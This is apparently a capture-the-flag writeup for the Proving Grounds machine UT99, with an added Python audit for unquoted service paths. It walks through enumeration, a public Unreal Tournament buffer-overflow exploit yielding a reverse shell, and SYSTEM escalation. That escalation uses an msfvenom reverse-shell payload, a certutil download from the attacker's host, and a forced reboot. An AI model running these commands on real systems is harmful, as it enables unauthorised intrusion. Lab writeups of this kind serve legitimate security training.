Pentest Everything
UT99

Proving Grounds PG Practice UT99 writeup

Nmap

sudo nmap 192.168.142.44 -p- -sS -sV

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          FileZilla ftpd
80/tcp   open  http         Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
443/tcp  open  ssl/http     Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
3306/tcp open  mysql        MySQL (unauthorized)
6660/tcp open  irc          InspIRCd
[...]
7000/tcp open  irc          InspIRCd
6673/tcp open  vision_elmd?
7001/tcp open  tcpwrapped
7005/tcp open  tcpwrapped
7007/tcp open  irc          InspIRCd
Service Info: Hosts: localhost, www.example.com, irc.madcowz.localdomain; OS: Windows; CPE: cpe:/o:microsoft:window

Whilst FTP is open, I was unable to connect successfully without valid credentials, as shown below:

Trying the web server we see we are taken to the MadCowz website.

Running whatweb against the web server shows it is running Apache 2.4.16 on a 32-bit Windows host.

From here nothing else too interesting was found on the web server by means of exploitation. MySQL login was also denied to my attacking machine.

However, we do have IRC open on a large range of ports 6660-7000,7007. Connecting to these ports with command line options was proving unreliable due to frequent disconnections. Installing HexChat proved much more successful.

sudo apt-get install hexchat

With HexChat open, add a network and use the settings shown below, ensuring the correct IP is set.

After doing so, close the window and connect to the new network. You should see a screen similar to the one below:

From here go to Server --> Channel List and perform a wildcard (*) search with the default settings to find the channel #ut99.

This channel indicates that the server is intended for Unreal Tournament 99, which we know from previous enumeration is running on Windows. Joining the channel also reveals the user Daisy.

Searching for Unreal Tournament 99 exploits for Windows on exploit-db shows the following:

After downloading the exploit code and looking through it we see the following usage example:

unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port>

We know from the HexChat and Nmap enumeration that the server for UT99 is running on port 7778. I set up a netcat listener on my attacking machine to port 80. I then used the following command to connect to the target server.

perl ut99.pl 192.168.142.44 7778 192.168.49.142 80

This resulted in a reverse shell.

From here, standard enumeration finds the directory C:\ftp with the following contents.

 Directory of c:\ftp

10/07/2015  06:21 AM    <DIR>          .
10/07/2015  06:21 AM    <DIR>          ..
10/07/2015  01:44 PM        35,984,520 FoxitReader706.1126_enu_Setup.exe
10/07/2015  04:46 AM        35,922,892 KB968930.msu
10/07/2015  01:45 PM       114,238,280 xampp-win32-5.6.12-0-VC11-installer.exe

The version of Foxit Reader shown, 7.0.6.1126, appears to be vulnerable to an unquoted service path privilege escalation.

Checking installed software on the target system we can see Foxit Reader is installed.

 Directory of c:\Program Files (x86)

10/07/2015  04:04 AM    <DIR>          .
10/07/2015  04:04 AM    <DIR>          ..
11/02/2006  06:33 AM    <DIR>          Common Files
10/07/2015  04:04 AM    <DIR>          Foxit Software
10/03/2015  02:34 AM    <DIR>          InspIRCd
04/11/2009  09:30 AM    <DIR>          Internet Explorer
11/02/2006  08:05 AM    <DIR>          MSBuild
09/30/2015  11:12 PM    <DIR>          Mumble
11/02/2006  08:05 AM    <DIR>          Reference Assemblies
04/11/2009  09:30 AM    <DIR>          Windows Calendar
01/20/2008  08:09 PM    <DIR>          Windows Collaboration
01/20/2008  08:08 PM    <DIR>          Windows Defender
04/11/2009  09:30 AM    <DIR>          Windows Mail
04/11/2009  09:30 AM    <DIR>          Windows Media Player
11/02/2006  08:05 AM    <DIR>          Windows NT
04/11/2009  09:30 AM    <DIR>          Windows Photo Gallery
04/11/2009  09:30 AM    <DIR>          Windows Sidebar
               0 File(s)              0 bytes
              17 Dir(s)  13,051,826,176 bytes free

Querying the service on the target system shows that it runs in the context of SYSTEM and that the binary path indeed contains spaces and is not wrapped in quotes.

cmd:>sc qc FoxitCloudUpdateService

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitCloudUpdateService
TYPE               : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE         : 2   AUTO_START
ERROR_CONTROL      : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP   : 
TAG                : 0
DISPLAY_NAME       : Foxit Cloud Safe Update Service
DEPENDENCIES       : 
SERVICE_START_NAME : LocalSystem
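To audit for this misconfiguration rather than exploit it, the following added Python example (not code from the writeup) parses the `sc qc` output above, flags an unquoted binary path that contains spaces, lists the files Windows would look for before reaching the real binary (none of their parent directories may be writable by standard users, which is the control that fails on this box), and emits the quoted `sc config` remediation. The `sc qc` text is copied from the writeup; the function names are my own.

```python
import re

# `sc qc` output quoted in the writeup above (page data); its path is unquoted and contains spaces.
FOXIT_PATH = r"C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe"
SC_QC_OUTPUT = f"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitCloudUpdateService
TYPE               : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : {FOXIT_PATH}
DISPLAY_NAME       : Foxit Cloud Safe Update Service
SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Map each FIELD_NAME in `sc qc` output to its value."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^(\w+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def executable_part(binary_path):
    """Drop service arguments: keep everything up to and including the first '.exe'."""
    end = binary_path.lower().find(".exe")
    return binary_path if end == -1 else binary_path[:end + 4]

def probed_paths(binary_path):
    """Files CreateProcess tries, in order, for an unquoted command line: it cuts the line
    at each space and appends .exe when the fragment has no extension. No directory that
    could hold one of these files may be writable by non-administrators."""
    exe = executable_part(binary_path)
    probes = []
    for i, ch in enumerate(exe):
        if ch == " ":
            frag = exe[:i]
            probes.append(frag if "." in frag.rsplit("\\", 1)[-1] else frag + ".exe")
    probes.append(exe)  # the intended binary is tried last
    return probes

def audit_service(sc_qc_text):
    """Return (paths_to_lock_down, remediation) or ([], None) when the path is already safe."""
    fields = parse_sc_qc(sc_qc_text)
    path = fields.get("BINARY_PATH_NAME", "")
    if path.startswith('"') or " " not in executable_part(path):
        return [], None
    # sc.exe wants the embedded quotes escaped so the stored path is itself quoted
    fix = f'sc config {fields["SERVICE_NAME"]} binPath= "\\"{path}\\""'
    return probed_paths(path)[:-1], fix
```

The fifth entry returned for this service is `...\Foxit Reader\Foxit.exe`, which is exactly the location the writeup goes on to abuse; the directory ACL, not the service, is what needs fixing.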

I then tested for write privileges in the binary path by creating a text file in the C:\Program Files (x86)\Foxit Software\Foxit Reader\ path.

echo Hello > test.txt

Checking the contents of the directory after doing so we see the test.txt file.

 Directory of c:\Program Files (x86)\Foxit Software\Foxit Reader

08/25/2021  12:35 PM    <DIR>          .
08/25/2021  12:35 PM    <DIR>          ..
11/26/2014  06:03 PM           385,248 64BitMailAgent.exe
10/07/2015  04:04 AM    <DIR>          Advertisement
10/07/2015  04:04 AM    <DIR>          docusign
10/07/2015  04:05 AM    <DIR>          Foxit Cloud
08/25/2021  12:32 PM             7,168 Foxit.exe
11/27/2014  10:24 AM        42,164,448 FoxitReader.exe
11/27/2014  03:49 PM            74,588 FoxitReader.exe.man
11/26/2014  06:03 PM         4,856,544 FoxitUpdater.exe
11/26/2014  07:15 PM         1,621,728 FXCUSTOM.dll
10/07/2015  04:04 AM    <DIR>          lex
08/28/2014  10:25 AM            27,076 notice.txt
10/07/2015  04:04 AM    <DIR>          plugins
10/07/2015  04:04 AM    <DIR>          Release Note
11/26/2014  06:03 PM         2,093,280 SendCrashReport.exe
10/07/2015  04:04 AM    <DIR>          Shell Extensions
10/07/2015  04:04 AM    <DIR>          Skins
10/07/2015  04:04 AM    <DIR>          stamps
10/07/2015  04:04 AM    <DIR>          Start
08/25/2021  12:35 PM                 8 test.txt
11/26/2014  07:07 PM         2,302,176 TrackReview.exe
10/07/2015  04:05 AM           278,490 unins000.dat
10/07/2015  04:02 AM         1,479,392 unins000.exe
10/07/2015  04:05 AM            22,701 unins000.msg
11/18/2014  04:38 PM         2,004,704 UninstallPrint.exe
10/07/2015  04:05 AM             1,270 UpdaterInfo.xml
              15 File(s)     57,318,821 bytes
              12 Dir(s)  13,053,591,552 bytes free

I then performed a test reboot of the machine and confirmed that, as the user Daisy, I was able to reboot it. This looks like a path to privilege escalation.

First, using msfvenom, I created a stageless reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.142 LPORT=80 -f exe -o Foxit.exe

I then uploaded this to the directory C:\Program Files (x86)\Foxit Software\Foxit Reader\.

certutil.exe -f -urlcache -split http://<IP>/Foxit.exe

After the upload was completed, I started a netcat listener on my attacking machine and then rebooted the target system.

shutdown.exe -r -f -t 1

Shortly after I was able to obtain privileges as SYSTEM.

Last updated 2 years ago


References

  • Exploit Database: Unreal Tournament - Remote Buffer Overflow (SEH)
  • Exploit Database: Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation